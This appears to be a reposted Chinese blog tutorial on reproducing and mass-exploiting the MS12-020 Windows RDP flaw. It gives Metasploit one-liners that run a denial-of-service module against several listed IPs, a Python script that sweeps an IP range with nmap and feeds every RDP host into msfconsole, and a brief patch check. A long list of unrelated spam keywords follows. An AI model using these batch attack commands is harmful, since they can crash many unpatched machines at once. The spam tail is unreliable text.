MS12-020漏洞复现及自动化批量利用
发表于:2025-01-20 作者:千家信息网编辑
千家信息网最后更新 2025年01月20日,漏洞描述Windows 远程桌面协议漏洞,可执行代码,POC可导致蓝屏。(RDP远程桌面执行代码漏洞)影响目标Windows XP sp3Windows xp sp2Windows Vista sp2
千家信息网最后更新 2025年01月20日MS12-020漏洞复现及自动化批量利用
漏洞描述
Windows 远程桌面协议漏洞,可执行代码,POC可导致蓝屏。(RDP远程桌面执行代码漏洞)
影响目标
Windows XP sp3Windows xp sp2Windows Vista sp2Windows 7Windows Server 2003Windows Server 2008Windows Server 2008 R2
msfpayload利用
msfconsoleuse auxiliary/dos/windows/rdp/ms12_020_maxchannelidsset rhost run
此pyload仅支持单目标。
通过msfconsole快速启动
msfconsole -x "use auxiliary/dos/windows/rdp/ms12_020_maxchannelids;set rhost 10.129.10.10;run;set rhost 10.129.10.37;run;set rhost 10.129.10.169;run;set rhost 10.129.10.209;run;set rhost 10.129.10.232;run;"
通过bash脚本批量生成检测脚本(nmap-port2ip.py)
#encoding:utf-8import xml.saximport sysimport osclass MovieHandler( xml.sax.ContentHandler ): def __init__(self, filterport=None): self.CurrentData = "" self.port=filterport self.data = "" self.datas=[] # 元素开始事件处理 def startElement(self, tag, attributes): self.CurrentData = tag if tag == "address": self.data=attributes["addr"] # 元素结束事件处理 def endElement(self, tag): if self.CurrentData == "address": self.datas.append(self.data) self.data="" self.CurrentData = ""class Gather(object): def __init__(self, filterport=None): # 创建一个 XMLReader self.parser = xml.sax.make_parser() # turn off namepsaces self.parser.setFeature(xml.sax.handler.feature_namespaces, 0) # 重写 ContextHandler self.Handler = MovieHandler(filterport) self.parser.setContentHandler( self.Handler ) def run(self, port): self.Handler.datas=[] self.parser.parse(port+".xml") print(self.Handler.datas) def get_ans(self): return self.Handler.datasif __name__ == "__main__": if len(sys.argv) !=3: os.exit() os.system("nmap "+sys.argv[1]+" -p "+sys.argv[2]+" --open -oX "+sys.argv[2]+".xml") g = Gather() g.run(sys.argv[2]) # create cmd cmd = '"use auxiliary/scanner/rdp/ms12_020_check;set threads 20;' ips = g.get_ans() if len(ips)>0: for ip in g.get_ans(): cmd += "set rhosts "+ip+";run;" cmd += 'exit;"' os.system("msfconsole -x " + cmd)# 使用方法python nmap-port2ip.py # 功能:针对某种服务的漏洞对指定IP段的所有主机进行检测,获取可能存在问题的主机IP,并调用对应的Msf Payload进行利用尝试。# ip可支持单一IP、CIDR形式IP、10.129.1.1-154等几种,格式与nmap一致# port仅支持单端口
漏洞补丁检测
systeminfo | find /i "KB2621440"如果存在结果如下,证明已打补丁,否则,需要打对应的补丁。
Windows Server 2003补丁
参考文章
- 微软MS12-020
漏洞
补丁
支持
检测
主机
事件
代码
元素
桌面
目标
脚本
处理
一致
使用方法
功能
形式
文章
方法
格式
端口
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
静安区数据库安防系统厂家情况
华讯网络技术支持
1u服务器热
软件开发的技能要求
怎么选择短视频服务器
金蝶打开服务器没有响应
宁波软件开发设计
青海智慧社区软件开发
网络安全教师奖名单
关系数据库的基本知识
杭州省公安厅网络安全招聘
证件处理软件开发 渐变蓝
女性手游研究数据库
上高软件开发文档
上海工程软件开发发展
性能测试网络安全专业
归属地淘宝数据库
加固服务器包含多少配件
derby数据库管理员
池州手机软件开发费用
前锦网络技术有限公司北京
手机网络安全警告怎么关闭
数据库的触发器
申汇互联网科技
加强留斯期间网络安全
九江网络安全课程收费标准
绝地求生韩服单独服务器
厦门首届网络安全宣传周活动
浙江小伙自学网络技术
池州手机软件开发费用